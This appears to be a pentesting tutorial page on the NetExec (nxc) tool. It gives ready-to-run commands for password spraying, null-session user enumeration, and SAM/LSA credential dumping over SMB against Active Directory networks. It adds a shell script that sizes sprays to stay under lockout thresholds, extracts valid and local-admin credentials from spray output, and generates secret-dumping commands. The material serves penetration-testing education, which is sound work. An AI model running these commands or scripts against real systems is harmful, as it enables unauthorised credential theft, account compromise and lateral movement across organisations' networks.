15 - NetExec (nxc)
#Overview
NetExec (binary: nxc or netexec) is the actively maintained successor to CrackMapExec (CME), which stopped receiving updates in 2023. It is the workhorse of modern internal pentesting for credential validation, post-exploitation and lateral movement: one command-line interface in front of several protocols lets you validate credentials, enumerate targets, execute commands, dump secrets and run protocol-specific attack modules, all with the same syntax.
Why NetExec over individual tools:
- One syntax for SMB, LDAP, WinRM, MSSQL, SSH, FTP, RDP, VNC, and WMI
- Built-in spraying controls (--continue-on-success, --no-bruteforce, --jitter) plus --pass-pol to read the lockout threshold before you spray
- Modular architecture — 50+ community modules for attack automation
- Database backend for tracking compromised hosts and credentials
- Consistent logging across all protocols
#Installation
```bash
# pipx (isolated install, as the project README recommends)
pipx install git+https://github.com/Pennyw0rth/NetExec
# pip (netexec is also published on PyPI)
pip install netexec
# Kali / Debian-based
sudo apt install netexec
# From source
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec && pip install .
```
Verify installation:
```bash
netexec --version
netexec smb --help
```
#Protocol Support
| Protocol | Port | Use Case |
|---|---|---|
| SMB | 445 | Credential validation, share enum, user enum, hash dumping, command execution, pass-the-hash |
| LDAP | 389/636 | Domain user/group dump, kerberoasting, AS-REP roasting, ADCS/LAPS/gMSA enumeration |
| WinRM | 5985/5986 | Remote PowerShell execution, credential validation |
| MSSQL | 1433 | Database credential validation, xp_cmdshell execution, linked server enumeration |
| SSH | 22 | Credential validation, remote command execution, sudo privilege check |
| FTP | 21 | Credential validation, file listing and retrieval |
| RDP | 3389 | Credential validation, NLA status check, screenshot capture |
| VNC | 5900 | Credential validation, screenshot capture |
| WMI | 135 | Credential validation, remote command execution |
#General Syntax
```bash
netexec <protocol> <target(s)> -u <username> -p <password> [options]
# <protocol>  -> smb, ldap, winrm, mssql, ssh, ftp, rdp, vnc, wmi
# <target(s)> -> one or more IPs/hostnames, CIDR ranges, or a file with one target per line;
#                targets are positional (netexec smb targets.txt), there is no target-file flag
# -u          -> username (single or file: -u users.txt)
# -p          -> password (single or file: -p passwords.txt)
# -t          -> number of concurrent threads, not a target file
```
#Key Global Flags
| Flag | Purpose |
|---|---|
| -u <user> | Single username or file (-u users.txt) |
| -p <pass> | Single password or file (-p passwords.txt) |
| -H <hash> | Pass-the-hash with an NTLM hash (NT hash, or LM:NT) |
| -d <domain> | Domain to authenticate against; if omitted, NetExec uses the domain the target advertises (it does not fall back to local auth) |
| --local-auth | Authenticate against the local SAM instead of the domain |
| -x <cmd> | Execute a command via the protocol's native method |
| -X <ps_cmd> | Execute a PowerShell command (SMB/WinRM) |
| -M <module> | Run a specific module (e.g., -M lsassy) |
| -o KEY=VALUE | Set an option for the module selected with -M (list a module's options with --options) |
| -L | List available modules for the protocol |
| --continue-on-success | Don't stop after the first valid credential on a host |
| --no-bruteforce | Treat user and password lists as exact pairs (line N of users.txt with line N of passwords.txt) |
| -t <threads> | Number of concurrent threads (hosts worked in parallel); target files are passed positionally, not with -t |
| --jitter <seconds> | Random delay between authentication attempts (spraying OPSEC) |
| --log <file> | Write the run's output to a log file |
| --port <num> | Custom port |
| --timeout <sec> | Connection timeout |
#Module Contents
| Page | Purpose |
|---|---|
| SMB Operations | Share/user/session enumeration, hash dumping, pass-the-hash, command execution, scuffy, wcc, lsassy |
| LDAP Operations | Domain enumeration, kerberoasting, AS-REP roasting, ADCS/LAPS/gMSA, delegation, BloodHound |
| WinRM Operations | Credential validation, remote PowerShell, local auth |
| MSSQL Operations | Database auth, privilege checks, xp_cmdshell, linked servers |
| SSH / FTP / RDP / VNC / WMI | Credential validation and execution across additional protocols |
| Password Spraying | Spraying strategies, lockout avoidance, combo lists, CIDR-wide campaigns |
| Credential Dumping | SAM/LSA/NTDS dumping, lsassy, DPAPI, offline cracking integration |
| AD Attacks via NetExec | Full AD attack chains: enum → roast → crack → validate → escalate |
| NetExec Modules Reference | Complete catalog of built-in modules with protocol, purpose, and OPSEC risk |
#Quick Start Workflows
#Validate a single credential set across a subnet
```bash
netexec smb 10.10.10.0/24 -u administrator -p 'Summer2024!' --continue-on-success
```
#Enumerate AD from unauthenticated position
```bash
netexec smb 10.10.10.5 -u '' -p '' --shares      # null session shares
netexec smb 10.10.10.5 -u '' -p '' --rid-brute   # RID cycle users
netexec ldap 10.10.10.5 -u '' -p '' --users      # anonymous LDAP bind
```
#Spray then dump
```bash
# one password per round across users.txt; read the lockout threshold (--pass-pol) first
# and stay below it per observation window
netexec smb 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success
# --sam and --lsa need local admin on the target (the spray marks such hosts with Pwn3d!)
netexec smb 10.10.10.5 -u valid_user -p valid_pass --sam
netexec smb 10.10.10.5 -u valid_user -p valid_pass --lsa
```
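Triage helpers for the spray-then-dump workflow above, written as an added example (not NetExec code and not part of the original page). The two sample outputs are constructed to follow nxc's line layout (protocol, IP, port, hostname, message); the `--pass-pol` labels `Account Lockout Threshold` and `Reset Account Lockout Counter` are assumed from typical output and should be checked against a live run. The functions pull the lockout threshold and observation window out of `--pass-pol` output, turn them into a per-window password budget, extract every `[+]` hit and whether it came back `(Pwn3d!)`, list accounts that returned `STATUS_ACCOUNT_LOCKED_OUT`, and emit `--sam --lsa` dump commands only for hosts where the credential is local admin.

```shell
#!/bin/sh
# Spray-then-dump triage helpers. Added example, not NetExec code.
# Assumptions: nxc output lines are "PROTO IP PORT HOSTNAME MESSAGE..." and
# --pass-pol prints the labels parsed below; verify both against a live run.
set -u

# Constructed sample of `netexec smb 10.10.10.5 -u jsmith -p 'Fall2024!' --pass-pol`
SAMPLE_PASSPOL='SMB  10.10.10.5  445  DC01  [+] corp.local\jsmith:Fall2024!
SMB  10.10.10.5  445  DC01  [+] Dumping password info for domain: CORP
SMB  10.10.10.5  445  DC01  Minimum password length: 7
SMB  10.10.10.5  445  DC01  Account Lockout Threshold: 5
SMB  10.10.10.5  445  DC01  Reset Account Lockout Counter: 30 minutes
SMB  10.10.10.5  445  DC01  Locked Account Duration: 30 minutes'

# Constructed sample of `netexec smb 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success`
SAMPLE_SPRAY='SMB  10.10.10.5   445  DC01  [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB  10.10.10.5   445  DC01  [-] corp.local\asmith:Fall2024! STATUS_LOGON_FAILURE
SMB  10.10.10.5   445  DC01  [+] corp.local\jsmith:Fall2024!
SMB  10.10.10.20  445  FS01  [+] corp.local\jsmith:Fall2024! (Pwn3d!)
SMB  10.10.10.21  445  WS01  [-] corp.local\bjones:Fall2024! STATUS_ACCOUNT_LOCKED_OUT
SMB  10.10.10.22  445  WS02  [+] corp.local\svc_backup:Fall2024! (Pwn3d!)'

# Numeric value after a --pass-pol label; prints 0 when the value is absent or "Not Set".
passpol_value() {   # $1 = pass-pol output, $2 = label text
  label=$2
  printf '%s\n' "$1" | awk -F"$label" 'NF > 1 { v = $2; gsub(/[^0-9]/, "", v); print (v == "" ? 0 : v); exit }'
}
lockout_threshold()      { passpol_value "$1" 'Account Lockout Threshold:'; }
lockout_window_minutes() { passpol_value "$1" 'Reset Account Lockout Counter:'; }

# Passwords you can try per observation window while keeping a margin of two
# attempts below the threshold (bad-password counters from other sources are invisible to you).
safe_attempts() {   # $1 = lockout threshold (0 = no lockout policy)
  if [ "$1" -eq 0 ]; then echo unlimited; return; fi
  m=$(( $1 - 2 ))
  [ "$m" -lt 1 ] && m=1
  echo "$m"
}

# Every successful login as "IP DOMAIN\USER PASSWORD admin|user". Field 5 is the
# status tag, field 6 the credential, field 7 "(Pwn3d!)" when the account is local
# admin on that host. Passwords containing spaces would need a different split.
valid_creds() {   # $1 = spray output
  printf '%s\n' "$1" | awk '
    $5 == "[+]" {
      i = index($6, ":")
      if (i == 0) next                      # informational [+] line, not a credential
      admin = ($7 == "(Pwn3d!)") ? "admin" : "user"
      print $2, substr($6, 1, i - 1), substr($6, i + 1), admin
    }'
}

# Accounts that came back STATUS_ACCOUNT_LOCKED_OUT: drop them from the next round
# and treat the event as a sign the spray is already too aggressive.
locked_accounts() {   # $1 = spray output
  printf '%s\n' "$1" | awk '/STATUS_ACCOUNT_LOCKED_OUT/ { i = index($6, ":"); print substr($6, 1, i - 1) }' | sort -u
}

# --sam/--lsa need local admin, so only hosts flagged admin get a dump command.
dump_commands() {   # $1 = spray output
  valid_creds "$1" | awk '$4 == "admin" {
      i = index($2, "\\")
      printf "netexec smb %s -d %s -u %s -p \047%s\047 --sam --lsa\n", $1, substr($2, 1, i - 1), substr($2, i + 1), $3
  }'
}

threshold=$(lockout_threshold "$SAMPLE_PASSPOL")
echo "Lockout threshold: $threshold, counter resets after $(lockout_window_minutes "$SAMPLE_PASSPOL") minutes"
echo "Passwords to spray per window: $(safe_attempts "$threshold")"
echo "Valid credentials:";                    valid_creds "$SAMPLE_SPRAY"
echo "Locked out (remove from next round):";  locked_accounts "$SAMPLE_SPRAY"
echo "Dump commands:";                        dump_commands "$SAMPLE_SPRAY"
```

To use it on a real run, replace the two sample variables with `$(netexec smb ... --pass-pol)` and `$(netexec smb ... --continue-on-success)` captured output, spray at most `safe_attempts` passwords per `lockout_window_minutes` window, and stop the round as soon as `locked_accounts` returns anything.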
#Related Modules
- Enumeration — Service discovery that feeds NetExec targets
- Active Directory Attacks — Techniques NetExec automates
- Lateral Movement — NetExec is the primary tool for moving between hosts with validated credentials
- Credential Hunting — What to do with dumped hashes
- Tools Cheat Sheet — Quick-reference NetExec commands